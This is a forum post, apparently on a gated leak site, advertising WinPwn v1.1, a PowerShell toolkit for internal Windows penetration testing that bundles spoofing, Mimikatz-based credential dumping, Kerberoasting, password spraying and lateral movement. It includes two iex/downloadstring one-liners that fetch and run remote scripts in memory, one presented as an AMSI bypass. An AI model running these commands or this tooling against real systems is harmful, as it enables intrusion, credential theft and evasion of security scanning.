Locked WinPwn v1.1 Automation for internal Windows Penetration Testing

[itsMe]

This is the hidden content, please

• Sign In
• or
• Sign Up

This is the hidden content, please

• Sign In
• or
• Sign Up

 

Automation for internal Windows Penetration Testing.

    1) Automatic Proxy Detection
    2) Elevated or unelevated Detection
    3) Forensic Mode oder Pentest Mode
    a. Forensik -> Loki + PSRECON + Todo: Threathunting functions
    b. Pentest -> Internal Windows Domain System
    i. Inveigh NBNS/SMB/HTTPS Spoofing
    ii. Local Reconing -> Hostenum, SessionGopher, FileSearch, PSRecon
    iii. Domain Reconing -> GetExploitableSystems, Powerview functions, ACL-Analysis, ADRecon
    1) Todo: Grouper for Group Policy overview
    iv. Privilege Escalation -> Powersploit (Allchecks), GPP-Passwords, MS-Exploit Search (Sherlock), WCMDump, JAWS
    v. Lazagne Password recovery
    vi. Exploitation -> Kerberoasting, Mimikittenz, Mimikatz with Admin-rights
    vii. LateralMovement -> FindLocalAdminAccess
    1) Invoke-MassMimikatz || Powershell Empire Remote Launcher Execution over WMI
    2) DomainPasswordspray

    viii. Share Enumeration
    ix. FindGPOLocation –> Search for user/group rights
    x. Find-Fruit

Changelog v1.1

This version contains mainly new features. The execution of various C# binaries in memory, GPO audit functions, various new local recon checks, and domain checks.

Just Import the Modules with: Import-Module .\WinPwn.ps1 or iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn.ps1’)

For AMSI Bypass use the following oneliner: iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/ObfusWinPwn.ps1’)

This is the hidden content, please

• Sign In
• or
• Sign Up